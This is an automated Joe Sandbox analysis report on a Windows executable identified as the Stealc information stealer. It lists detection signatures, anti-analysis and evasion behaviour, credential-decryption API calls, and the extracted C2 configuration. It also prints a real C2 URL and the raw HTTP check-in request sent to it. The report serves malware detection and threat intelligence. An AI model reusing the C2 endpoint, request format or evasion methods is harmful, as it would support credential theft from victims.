Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544998
MD5:b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1:ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256:a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4460 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B2D5F7C5A51B55BFE094DBE2A60DA2E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4460JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4460JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.f10000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T00:20:03.381251+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.f10000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00F29030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00F1A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00F172A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00F1A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00F1C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F1E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F11710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F24B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F23B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F1EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F162D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--
                Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
                Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/b
                Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
                Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa
                Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/w
                Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/wKL
                Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F500980_2_00F50098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E0_2_0137214E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6B1980_2_00F6B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F421380_2_00F42138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013643030_2_01364303
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F542880_2_00F54288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7E2580_2_00F7E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013693DD0_2_013693DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8D39E0_2_00F8D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014152DB0_2_014152DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9B3080_2_00F9B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013735670_2_01373567
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F545A80_2_00F545A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D5A80_2_00F7D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C74410_2_012C7441
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F345730_2_00F34573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3E5440_2_00F3E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136E48C0_2_0136E48C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F996FD0_2_00F996FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F566C80_2_00F566C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8A6480_2_00F8A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F867990_2_00F86799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6D7200_2_00F6D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136C92F0_2_0136C92F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7F8D60_2_00F7F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F698B80_2_00F698B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6B8A80_2_00F6B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F648680_2_00F64868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F9CE0_2_0128F9CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136781D0_2_0136781D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136280D0_2_0136280D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F84BA80_2_00F84BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F80B880_2_00F80B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01365D470_2_01365D47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8AC280_2_00F8AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F64DC80_2_00F64DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F65DB90_2_00F65DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F41D780_2_00F41D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6BD680_2_00F6BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7AD380_2_00F7AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F81EE80_2_00F81EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F58E780_2_00F58E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136FFCF0_2_0136FFCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128DE5E0_2_0128DE5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D1EF20_2_012D1EF2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F14610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: yhvanrkb ZLIB complexity 0.994987962613293
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F29790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00F23970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7W9T3KML.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2133504 > 1048576
                Source: file.exeStatic PE information: Raw size of yhvanrkb is bigger than: 0x100000 < 0x19dc00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F29BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2149bd should be: 0x20bfe1
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: yhvanrkb
                Source: file.exeStatic PE information: section name: owhwljin
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138D064 push edx; mov dword ptr [esp], ebx0_2_0138D44A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3A0DC push eax; retf 0_2_00F3A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D3176 push eax; mov dword ptr [esp], edi0_2_013D31E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01420111 push ebp; mov dword ptr [esp], ecx0_2_01420152
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01420111 push 12BE9830h; mov dword ptr [esp], ebp0_2_01420195
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01420111 push 6A4B206Ch; mov dword ptr [esp], ebx0_2_014201DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 527194D0h; mov dword ptr [esp], ebp0_2_0137216E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 50296553h; mov dword ptr [esp], esp0_2_01372213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 0D3E45BCh; mov dword ptr [esp], eax0_2_0137222F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 7B6F8124h; mov dword ptr [esp], esi0_2_013722F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 56F78DF1h; mov dword ptr [esp], edx0_2_01372374
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push eax; mov dword ptr [esp], esp0_2_01372382
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 2E869085h; mov dword ptr [esp], eax0_2_013723B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx0_2_0137241C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 1B37D633h; mov dword ptr [esp], edx0_2_01372463
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push eax; mov dword ptr [esp], ebx0_2_0137248C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 2B004513h; mov dword ptr [esp], edi0_2_013725E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 5E859901h; mov dword ptr [esp], ebp0_2_0137260D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push edx; mov dword ptr [esp], 6DCAD2DEh0_2_01372611
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 20941F2Dh; mov dword ptr [esp], ebp0_2_0137262C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 389D0686h; mov dword ptr [esp], ebx0_2_0137267F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 2EC98222h; mov dword ptr [esp], esi0_2_01372691
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 40AABE50h; mov dword ptr [esp], ecx0_2_01372710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push eax; mov dword ptr [esp], ebx0_2_0137276E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push edx; mov dword ptr [esp], 37BE06D6h0_2_0137279B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push edi; mov dword ptr [esp], edx0_2_0137280B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 42DBE0D3h; mov dword ptr [esp], esp0_2_01372867
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push eax; mov dword ptr [esp], edx0_2_01372902
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx0_2_01372921
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 665D2052h; mov dword ptr [esp], esp0_2_01372969
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137214E push 5F819381h; mov dword ptr [esp], esi0_2_01372978
                Source: file.exeStatic PE information: section name: yhvanrkb entropy: 7.953026815598935

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
